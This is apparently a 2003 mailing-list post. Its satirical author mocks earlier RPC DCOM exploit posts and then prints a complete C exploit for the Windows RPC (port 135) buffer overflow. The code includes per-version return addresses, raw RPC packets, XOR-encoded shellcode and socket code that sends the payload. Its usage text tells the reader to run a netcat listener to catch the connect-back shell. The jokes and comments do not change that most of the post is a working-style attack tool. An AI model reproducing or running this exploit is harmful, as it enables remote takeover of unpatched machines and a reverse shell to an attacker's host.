Hey there Swami:
> Hi i found these offsets after so much tiring work
> anyways here is my first post with my proof of
> concept code i did tried on my network and all
> worked so please check and send me the suggestions
> and improvements
and Zero:
> Cleaned up the code a bit as it was messy - well
> for me anyways
and Chris:
> the code was fixed!
> you have to compile the new version
> http://www.k-otik.com/exploits/07.30.dcom48.c.php
You guys yank my leg. Hahaha. Mortis like funny. I need
more funny. Lady Death caught me up at 3am hacking. Again.
Not gonna get s3x for a while.
Fair is fair. Bad poem in trade:
This sploit is mean
This sploit is bad
Example of programming
Terribly sad
Nebba seena chain of 48 else ifs before. Didjew learn that
at CalTech? Say hi!! They remember me. 7 feet tall,
skeleton, scythe. You know. I'm pretty noticeable.
I am enclosing my first Perl program. I hope I didn't taint
it.
--
Till death do us part,
m0rtis
/* ****************************************************************** */
/* ***** NAME: rpcABC.c ***** */
/* ***** PURPOSE: Remote administration of Windoze ***** */
/* ***** machines ***** */
/* ***** AUTHOR: Mortis, esq., Collector of Souls ***** */
/* ***** COPYRIGHT: 2003@ Mortis, Ltd. ***** */
/* ***** DISCLAIMER: Mortis is a not a QA fool. Once it ***** */
/* ***** compiled it was done. U didn't think ***** */
/* ***** I actually RAN it, did you? ***** */
/* ****************************************************************** */
/* LICENSE:
It be much tiring work and brain noodles to calculate these
codez and programmings. Mortis spend big energies imagining
these instruction and he expects that no one will theft
his elephant.
If you rip my code I will rip your soul.
Contrary to popular belief, I did not steal this code from
kraptic, swami, or any other fakir. I don't read the news
and I never looked at this web page:
http://www.k-otik.com/exploits/07.30.dcom48.c.php
Scout's honor.
*/ /* NOTE TO THE MENTALLY CHALLENGED:
Add the new offset to the list
*/ /* SPECIAL NOTE TO MARK BASSET:
Steal a decent copy of MSVC or go to eeye and get something
that workz...
*/ /* SPECIAL NOTE TO RICHARD SMITH:
Dude, I got the wierdest SPAM last week. I'll forward it to
you so you can contact the press. No one wants to interview
Death incarnated. Trust me. Plus you got all the contactz...
*/ /* PLEASE HELP FEED MY LITTLE SKELETONS:
Mortis really does need lots of money. I expect you little
monkees to give me US$.05 for every machine you compromise
with this awesum 60day. I trust U guys; honor system.
Please send your cash to:
Mortis
P.O. Box 217
Nashua, NH 03061
If you prefer paypal, I can hack my fees from these dudez:
http://www.ronaldshouse.com/
*/
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
/* I wish someone would tell me how to sploit the other
ports. This port blowz. */
#define TARGET_PORT 135
/* Return codez */
#define SUCCESS 0
#define SEND_FAILED 1
#define RECV_FAILED 2
#define INVALID_ARGUMENTS 3
#define RANDOMLY_SHIT_THE_BED 4
/* We can't afford to make this a readable function call because the
overhead would kill us. Performance is almost as important as learning */
#define ADDTOBUF(src,dest,dest_len) \
( memcpy((dest), (src), sizeof((src))) && ((dest_len) += sizeof((src))))
/* I'm not bright enough to understand that dude's post last week
about how to exploit this without needing a fsking address for
every version and language of windows ever produced. So I guess
I'll have to keep adding values to this list until I own so many
machines I get really bored.
Oh crap. Too late.
*/
struct OFFSET_ADDR_STRUCT {
char *offset_addr;
char *os_version;
} offsets[] = {
{"\xcf\xda\xee\x77", "Chinese winNT sp5"},
{"\xac\x0e\xf0\x77", "Chinese winNT sp6"},
{"\xc3\xea\xf0\x77", "Chinese NT sp6a"},
{"\x2a\xe3\xe2\x77", "Chinese win2k nosp"},
{"\x8b\x89\xe6\x77", "Chinese win2k sp1"},
{"\x2b\x49\xe0\x77", "Chinese win2k sp2"},
{"\x44\x43\x42\x41", "Chinese win2k sp3"},
{"\x29\x4c\xdf\x77", "Chinese win2k sp4"},
{"\x4d\x3f\xe3\x77", "Polish win2k nosp ver 5.00.2195"},
{"\x29\x2c\xe4\x77", "Polish win2k sp3 ver 5.00.2195 tested"},
{"\x13\x3b\xa5\x77", "Spanish win2k sp4"},
{"\xe5\x27\xf3\x77", "English winNT sp4"},
{"\x74\x16\xe8\x77", "English win2k nosp 1"},
{"\x6d\x3f\xe3\x77", "English win2k nosp 2"},
{"\xec\x29\xe8\x77", "English win2k sp1"},
{"\x2b\x49\xe2\x77", "English win2k sp2 1"},
{"\xb5\x24\xe8\x77", "English win2k sp2 2"},
{"\x7a\x36\xe8\x77", "English win2k sp3 1"},
{"\x5c\xfa\x2e\x77", "English win2k sp3 2"},
{"\x9b\x2a\xf9\x77", "English win2k sp4"},
{"\xe3\xaf\xe9\x77", "English xp nosp ver 5.1.2600"},
{"\xba\x26\xe6\x77", "English xp sp1 1"},
{"\xdb\x37\xd7\x77", "English xp sp1 2"},
{"\xbd\x73\x7d\x77", "English xp sp2"},
{"\xb0\x54\x22\x77", "English win2k3"},
{"\xe5\x27\xf3\x77", "Japanese win2k nosp"},
{"\x8b\x89\xe5\x77", "Japanese win2k sp1"},
{"\x2b\x49\xdf\x77", "Japanese win2k sp2"},
{"\x2a\xe3\xe1\x77", "Korean win2k nosp"},
{"\x8b\x89\xe5\x77", "Korean win2k sp1"},
{"\x2b\x49\xdf\x77", "Korean win2k sp2"},
{"\x2a\xe3\xe1\x77", "Mexican win2k nosp"},
{"\x8b\x89\xe8\x77", "Mexican win2k sp1"},
{"\x4d\x3f\xe3\x77", "Kenyan win2k sp1"},
{"\x8b\x89\xe8\x77", "Kenyan win2k sp1"},
{"\x2b\x49\xe2\x77", "Kenyan win2k sp1"},
{"\x7a\x88\x2e\x77", "German win2k sp3"},
{"\x29\x2c\xe3\x77", "German win2k sp3"},
{"\x29\x4c\xe0\x77", "German win sp4 1"},
{"\x56\xc2\xe2\x77", "German win sp4 2"},
{"\xfc\x18\xd4\x77", "German xp sp1"},
{"\x4b\x3e\xe4\x77", "French win2k Server SP1"},
{"\x56\xc2\xe2\x77", "French win2k Server SP4"},
{"\x4a\x75\xd4\x77", "French win xp no sp"},
{"\xfc\x18\xd4\x77", "French win xp sp 1"},
{"\x25\x2b\xaa\x77", "win2ksp3big"},
{"\x29\x4c\xdf\x77", "win2ksp4big"},
{"\xfb\x7b\xa1\x71", "winxpsp01big"},
{NULL, NULL}
};
/* Note to self:
Dearest self,
How are you today? I am well. Lady Death sends her regards.
Please comment this section when you are sober enough to
remember what the fsck it does.
Oh, yeah. Please remember to brush your teeth, too. And wear
clean underwear. Thanks. I appreciate it. So does Lady Death.
I miss you so much. Come back soon.
-Mortis
*/
#define KAKACOPY1(buffer, offset) ( \
*(unsigned long *)(buffer+offset) = \
*(unsigned long *)(buffer+offset) + sizeof(buffer) / 2)
#define KAKACOPY2(buffer, offset, size) ( \
*(unsigned long *)(buffer+offset) = \
*(unsigned long *)(buffer+offset) + size - 0xc)
/* Herein lies the secrets of the universe. If you play these codez
backwards, you will hear dead people. Proceed with caution. These
codez are not suitable for the elderly, people with heart conditions,
or anyone predisposed to agita. I _am_ the harbinger of Death, so you
may want to pay heed.
These codez may cause diarrhea, severe head pain, hair loss,
premature ejactulation, depression, green scum on your toes, and other
minor health issues. Don't let that stop you from asking your doctor
to give them to you...
*/
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
unsigned char chunk_o_stuff1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03,0x00,0x00,0xE5,0x00,0x00,0x00,
0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00,0x06,0x00,0x01,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45,0x64,0x49,0xB0,0x70,0xDD,0xAE,
0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E,0x0D,0x00,0x00,0x00,0x00,0x00,
0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D,0xCE,0x11,0xA6,0x6A,0x00,0x20,
0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41,0x52,0x42,0x01,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0xA8,0xF4,0x0B,0x00,
0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,
0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03,0x00,0x00,0x00,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,
0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,
0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29,0xCD,0x00,0x00,0x00,0x00,0x00,
0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00,0x00,0x00,0x58,0x00,0x00,0x00,
0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00,0x00,0x00,0x78,0x00,0x00,0x00,
0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09,0x02,0x00,0x00,0x00,0x00,0x00,
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x78,0x19,0x0C,0x00,
0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00,0x00,0x00,0x70,0xD8,0x98,0x93,
0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00,0x00,0x00,0x32,0x00,0x31,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00,0x00,0x00,0x60,0x00,0x00,0x00,
0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03,0x00,0x00,0x00,0x00,0x00,0x00,
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x00,0x00,0x00,
0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E,0xE9,0x4A,0x99,0x99,0xF1,0x8A,
0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00,0x00,0x00,0x78,0x00,0x6E,0x00,
0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00,0x58,0x00,0x00,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00,0x00,0x00,0x30,0x00,0x2E,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00,0x00,0x00,0x0E,0x00,0xFF,0xFF,
0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};
unsigned char chunk_o_stuff2[]={
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x00,0x5C,0x00,0x5C,0x00};
/* All those 0x things are hurting my head. I better switch */
unsigned char chunk_o_stuff3[]=
"\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00\x4E\x00"
"\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00\x46\x00\x58\x00\x46\x00\x58\x00"
"\x29\x4c\xdf\x77\x38\x6e\x16\x76\x0d\x6e\x16\x76\xeb\x02\xeb\x05\xe8\xf9"
"\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01\xfc\xff\xff\x83\xe4\xfc\x8b\xec"
"\x33\xc9\x66\xb9\x99\x01\x80\x30\x93\x40\xe2\xfa\x7b\xe4\x93\x93\x93\xd4"
"\xf6\xe7\xc3\xe1\xfc\xf0\xd2\xf7\xf7\xe1\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7"
"\xdf\xfa\xf1\xe1\xf2\xe1\xea\xd2\x93\xd0\xe1\xf6\xf2\xe7\xf6\xc3\xe1\xfc"
"\xf0\xf6\xe0\xe0\xd2\x93\xd0\xff\xfc\xe0\xf6\xdb\xf2\xfd\xf7\xff\xf6\x93"
"\xd6\xeb\xfa\xe7\xc7\xfb\xe1\xf6\xf2\xf7\x93\xe4\xe0\xa1\xcc\xa0\xa1\x93"
"\xc4\xc0\xd2\xc0\xe7\xf2\xe1\xe7\xe6\xe3\x93\xc4\xc0\xd2\xc0\xfc\xf0\xf8"
"\xf6\xe7\xd2\x93\xf0\xff\xfc\xe0\xf6\xe0\xfc\xf0\xf8\xf6\xe7\x93\xf0\xfc"
"\xfd\xfd\xf6\xf0\xe7\x93\xf0\xfe\xf7\x93\xc9\xc1\x28\x93\x93\x63\xe4\x12"
"\xa8\xde\xc9\x03\x93\xe7\x90\xd8\x78\x66\x18\xe0\xaf\x90\x60\x18\xe5\xeb"
"\x90\x60\x18\xed\xb3\x90\x68\x18\xdd\x87\xc5\xa0\x53\xc4\xc2\x18\xac\x90"
"\x68\x18\x61\xa0\x5a\x22\x9d\x60\x35\xca\xcc\xe7\x9b\x10\x54\x97\xd3\x71"
"\x7b\x6c\x72\xcd\x18\xc5\xb7\x90\x40\x42\x73\x90\x51\xa0\x5a\xf5\x18\x9b"
"\x18\xd5\x8f\x90\x50\x52\x72\x91\x90\x52\x18\x83\x90\x40\xcd\x18\x6d\xa0"
"\x5a\x22\x97\x7b\x08\x93\x93\x93\x10\x55\x98\xc1\xc5\x6c\xc4\x63\xc9\x18"
"\x4b\xa0\x5a\x22\x97\x7b\x14\x93\x93\x93\x10\x55\x9b\xc6\xfb\x92\x92\x93"
"\x93\x6c\xc4\x63\x16\x53\xe6\xe0\xc3\xc3\xc3\xc3\xd3\xc3\xd3\xc3\x6c\xc4"
"\x67\x10\x6b\x6c\xe7\xf0\x18\x4b\xf5\x54\xd6\x93\x91\x93\xf5\x54\xd6\x91"
"\x28\x39\x54\xd6\x97\x4e\x5f\x28\x39\xf9\x83\xc6\xc0\x6c\xc4\x6f\x16\x53"
"\xe6\xd0\xa0\x5a\x22\x82\xc4\x18\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93"
"\x93\x1a\xce\xaf\x1a\xce\xab\x1a\xce\xd3\x54\xd6\xbf\x92\x92\x93\x93\x1e"
"\xd6\xd7\xc3\xc6\xc2\xc2\xc2\xd2\xc2\xda\xc2\xc2\xc5\xc2\x6c\xc4\x77\x6c"
"\xe6\xd7\x6c\xc4\x7b\x6c\xe6\xdb\x6c\xc4\x7b\xc0\x6c\xc4\x6b\xc3\x6c\xc4"
"\x7f\x19\x95\xd5\x17\x53\xe6\x6a\xc2\xc1\xc5\xc0\x6c\x41\xc9\xca\x1a\x94"
"\xd4\xd4\xd4\xd4\x71\x7a\x50\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90";
/* forget it... I liked this better... */
unsigned char chunk_o_stuff4[]={
0x5C,0x00,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,
0x35,0x00,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,
0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,
0x31,0x00,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};
unsigned char chunk_o_stuff5[]={
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,
0x00,0x00,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0x28,0x8C,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00};
/* OH BOY!! No more kaka. Herez the code... */
void bummer_dude (char *hint) {
printf("This sucks. The exploit didn't work.\n");
printf("Please send a message to FD and ask them why.\n");
printf("Some one will send you a batch file that makes it better.\n");
printf("Here's a hint, tho: %s\n", hint);
exit(RANDOMLY_SHIT_THE_BED);
}
void send_and_toss_the_answer (int socket, unsigned char *buf, int bufsize, char
*hint) {
unsigned char recv_buffer[0x1000]; /* <-- gotta lub hexxx */
if ( send(socket, buf, bufsize, 0) == -1 )
bummer_dude(hint);
recv(socket, recv_buffer, sizeof(recv_buffer)-2 , 0);
/* hahaha. oberflow that U luzer ^^^^ */
}
int main (int argc, char **argv) {
int i, bufsize, sockfd = 0;
u_short shell_port = 0;
unsigned long callback_ip = 0;
unsigned char send_buffer[0x1000]; /* <-- sexxxxxy. and so l33t. */
struct hostent *target;
struct sockaddr_in target_addr;
WSADATA wsa;
WSAStartup(MAKEWORD(2,0),&wsa);
printf("RPC DCOM Remote Exploit\n");
printf("modified by www.k-otiK.com\n");
printf("^h^h^h^h^h^h^h^h^h^h^h^h^h\n");
printf("Completely original code by Mortis.\n");
printf("Rezpect my authoritia!!\n");
if(argc<5) {
printf("Usage: %s <target> <connectback_ip> <cb port> <OS>\n",argv[0]);
printf(" On connectback_ip machine: nc -lp cbport\n");
printf(" Hint: It might just be smart to run the nc b4 the sploit.\n");
printf(" OS List:\n");
while (offsets[i].offset_addr)
printf(" %d %s\n", i, offsets[i++].os_version);
exit(INVALID_ARGUMENTS);
}
/* I suppose we should validate our parameters, but what fun would that be? */
/* sploit the sploit :) */
if ((target=gethostbyname(argv[1])) == NULL)
bummer_dude("Wow. A host without a name. Who w00da thunk that could
happen?");
/* 93. 93. WTF was the 93 for?
Hmmmmm. If it ain't broke don't fix it, right? */
callback_ip = inet_addr(argv[2]) ^ 0x93939393;
shell_port = htons((u_short)atoi(argv[3])) ^ (u_short)0x9393;
*(unsigned short *)&chunk_o_stuff3[378] = shell_port;
*(unsigned int *) &chunk_o_stuff3[383] = callback_ip;
/* recall that we couldn't code this without knowing the version
of windoze. This is where we customize the sploit to work
with everyone's choice of language and patch level. Wheeee!! */
memcpy(chunk_o_stuff3+36,
(char *)offsets->offset_addr[atoi(argv[4])],
sizeof(offsets->offset_addr));
/* BEGIN magic_incantations */
KAKACOPY1(chunk_o_stuff2,0); /* whoops... more kaka. Sorry */
KAKACOPY1(chunk_o_stuff2,8);
bufsize = 0;
ADDTOBUF(chunk_o_stuff1, send_buffer, bufsize);
ADDTOBUF(chunk_o_stuff2, send_buffer+bufsize, bufsize);
ADDTOBUF(chunk_o_stuff3, send_buffer+bufsize, bufsize);
ADDTOBUF(chunk_o_stuff4, send_buffer+bufsize, bufsize);
ADDTOBUF(chunk_o_stuff5, send_buffer+bufsize, bufsize);
KAKACOPY2(send_buffer, 8, sizeof(chunk_o_stuff3));
KAKACOPY2(send_buffer, 0x10, sizeof(chunk_o_stuff3));
KAKACOPY2(send_buffer, 0x80, sizeof(chunk_o_stuff3));
KAKACOPY2(send_buffer, 0x84, sizeof(chunk_o_stuff3));
KAKACOPY2(send_buffer, 0xb4, sizeof(chunk_o_stuff3));
KAKACOPY2(send_buffer, 0xb8, sizeof(chunk_o_stuff3));
KAKACOPY2(send_buffer, 0xd0, sizeof(chunk_o_stuff3));
KAKACOPY2(send_buffer, 0x18c, sizeof(chunk_o_stuff3));
/* END magic_incantations */
/* Note to self: Why the hell did I break that into chunks?
Please stop smoking crack. It's bad for you. */
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
bummer_dude("Couldn't even make a socket. This machine sux.");
target_addr.sin_family = AF_INET;
target_addr.sin_port = htons(TARGET_PORT);
target_addr.sin_addr = *((struct in_addr *)target->h_addr);
memset(&(target_addr.sin_zero), '\0', 8);
if ( connect(sockfd,
(struct sockaddr *)&target_addr,
sizeof(struct sockaddr) ) == -1 )
bummer_dude("You would have better luck with a host that has the port open");
send_and_toss_the_answer (sockfd, bindstr,
sizeof(bindstr), "Couldn't send the bind string");
send_and_toss_the_answer (sockfd, send_buffer,
bufsize, "Couldn't send the sploit");
return SUCCESS;
}
